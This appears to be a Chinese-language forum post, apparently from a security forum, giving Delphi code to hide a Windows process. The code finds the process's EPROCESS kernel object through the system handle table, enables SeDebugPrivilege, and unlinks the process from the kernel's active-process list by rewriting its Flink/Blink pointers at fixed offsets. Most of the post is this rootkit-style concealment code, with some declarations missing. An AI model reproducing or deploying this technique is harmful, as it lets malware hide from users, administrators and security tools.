function GetEProcess(PID: Cardinal): Cardinal;
var
HandleTable : pHandleInformation;
i : DWord;
hProcess: THandle;
begin
Result := 0;
hProcess := OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, PID);
HandleTable := GetSystemHandleInfo;
CPID := GetCurrentProcessId;
for i := 0 to HandleTable.NumberOfHandles -1 do
    if  (HandleTable.Handles[i].ProcessId = PID)and (HandleTable.Handles[i].Handle = hProcess) then
         begin
          Result := (Cardinal(HandleTable.Handles[i].pObject));//要得到的虚拟地址         
        Break;
         end;
//SetLength(HandleTable.Handles, 0);
FreeMem( HandleTable );
CloseHandle(hProcess);
end;

下面是函数GetSystemHandleInfo：

function GetSystemHandleInfo:PHandleInformation;
var
n : DWORD;
rv :NTSTATUS;
rs,res : DWORD;
pHandleInfo : PHandleInformation;
begin
Result := nil;
n := $1000;
pHandleInfo := AllocMem (n);
repeat
    rs := SizeOf (THandleInformation) + SizeOf (TSystemHandleInformation) * (n - 1);//遍历
    ReallocMem (pHandleInfo, rs);
    rv := ZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, rs, @res);
    n := n * 2;
until rv <> STATUS_INFO_LENGTH_MISMATCH;
if rv <> 0 then
begin
    ReallocMem (pHandleInfo, 0);
end;
Result := pHandleInfo;
end;

相关的定义部分：
const
STATUS_INFO_LENGTH_MISMATCH = $C0000004;
type
  NTSTATUS = LongInt;

type
_SYSTEM_INFORMATION_CLASS =
  (
  SystemHandleInformation = 16
  );
SYSTEM_INFORMATION_CLASS = _SYSTEM_INFORMATION_CLASS;

type
    _SystemHandleInformation = packed record
   ProcessID          :ULONG ;    //进程的标识ID
   ObjectTypeNumber    :UCHAR ;    //对象类型
   Flags          :UCHAR ;    //0x01 =  PROTECT_FROM_CLOSE,0x02 = INHERIT
   Handle          :SHORT ;    //对象句柄的数值
   pObject          :pointer  ;    //对象句柄所指的内核对象地址
   GrantedAccess       :ACCESS_MASK ;  //创建句柄时所准许的对象的访问权
end;
    TSystemHandleInformation = _SystemHandleInformation;
    SYSTEM_HANDLE_INFORMATION = _SystemHandleInformation;
    PSystemHandleInformation = ^_SystemHandleInformation;
    TZWQUERYSYSTEMINFORMATION = function(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation:
Pointer; SystemInformationLength: ULONG; ReturnLength: PULONG): NTSTATUS; stdcall;

type
THandleInformation = packed record
    NumberOfHandles : ULONG;
    Handles : array[0..0] of TSystemHandleInformation
end;
PHandleInformation =^THandleInformation;
var
  ZwQuerySystemInformation: TZWQUERYSYSTEMINFORMATION = nil;
////////////////////////////////////////////////////////////////////////////////////////////////////
以下是我再网上找到的修改EProcess隐藏进程，

请牛牛写个demo吧，那样很直观！
///////////////////////////////////////////////////////////////////////////////////////////////////
新人，技术很烂，还望大家多多包涵
双向链表隐藏进程，删除核心态APL双向链表，首先要获得EProcess虚拟地址。
function GetSystemHandleInfo:PHandleInformation;
var
n : DWORD;
rv :NTSTATUS;
rs,res : DWORD;
pHandleInfo : PHandleInformation;
begin
Result := nil;
n := $1000;
pHandleInfo := AllocMem (n);
repeat
rs := SizeOf (THandleInformation) + SizeOf (TSystemHandleInformation) * (n - 1);//遍历
ReallocMem (pHandleInfo, rs);
rv := ZwQuerySystemInformation (SystemHandleInformation, pHandleInfo, rs, @res);
n := n * 2;
until rv <> STATUS_INFO_LENGTH_MISMATCH;
if rv <> 0 then
begin
ReallocMem (pHandleInfo, 0);
RaiseLastOSError
end;
Result := pHandleInfo;
end;
先用OpenProcess来获得我们想要隐藏的目标进程的句柄，然后可以使用ZwQuerySystemInformation的SystemHandleInformation参数，使用ZwQuerySystemInformation函数获取所有核心句柄表，线性搜索到进程句柄，其指向的内核对象就是EPROCESS。
直接获得EProcess的代码如下：
function GetEProcess(PID: Cardinal): Cardinal;
var
HandleTable : pHandleInformation;
i : DWord;
hProcess, CPID : THandle;
begin
Result := 0;
hProcess := OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, PID);
HandleTable := GetSystemHandleInfo;
CPID := GetCurrentProcessId;
for i := 0 to HandleTable.NumberOfHandles -1 do
if (HandleTable.Handles[i].ProcessId = CPID) and
(HandleTable.Handles[i].Handle = hProcess) then
begin
Result := (Cardinal(HandleTable.Handles[i].Object_ )); //这里就是 EProcess的虚拟地址
Break;
end;
SetLength(HandleTable.Handles, 0);
FreeMem( HandleTable );
CloseHandle(hProcess);
end;
不要忘记了提权，SeDebug权限很好很强大，虽然是每个内核程序的必修课……
function EnableDebugPrivilege: Boolean;
function EnablePrivilege(hToken: Cardinal; PrivName: string; bEnable: Boolean): Boolean;
var
TP: TOKEN_PRIVILEGES;
Dummy: Cardinal;
begin
TP.PrivilegeCount := 1;
LookupPrivilegeValue(nil, pchar(PrivName), TP.Privileges[0].Luid);
if bEnable then
TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else TP.Privileges[0].Attributes := 0;
AdjustTokenPrivileges(hToken, False, TP, SizeOf(TP), nil, Dummy);
Result := GetLastError = ERROR_SUCCESS;
end;
var
hToken: Cardinal;
begin
OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken);
result:=EnablePrivilege(hToken, ‘SeDebugPrivilege', True);
CloseHandle(hToken);
end;

最后把那个Blink和Flink指针指向的地址读出来，一般情况下是EProcess+$88和EProcess+$8C，然后删核心态的APL
function HideProcess: boolean;
var
EProcess : DWord;
FLink, BLink: Cardinal;
begin
Result := false;
EProcess := GetEprocessFromPid(GetCurrentProcessId);
//showmessage(IntToHex(EProcess,1));
if EProcess < 1 then Exit;
Hide_EProcess := EProcess;
if not ReadVirtualMemory(EProcess+$88, @FLink, 4) then Exit;//Flink指针指向地址
if not ReadVirtualMemory(EProcess+$8C, @BLink, 4) then Exit;//Blink指针指向地址
if (FLink<$80000000)or(BLink<$80000000) then Exit;
Old_FLink_Addr := BLink;
Old_BLink_Addr := FLink+4;
ReadVirtualMemory(FLink+4, @Old_BLink, 4);
ReadVirtualMemory(BLink, @Old_FLink, 4);
if not WriteVirtualMemory(FLink+4, @BLink, 4) then Exit;
if not WriteVirtualMemory(BLink, @FLink, 4) then Exit;
Result := true;
end;
////////////////////////////////////////////////////////////////////////////////////////////////////////
有很多的申明没有。新手嘛，找不到！
谢谢。。

[课程]Linux pwn 探索篇！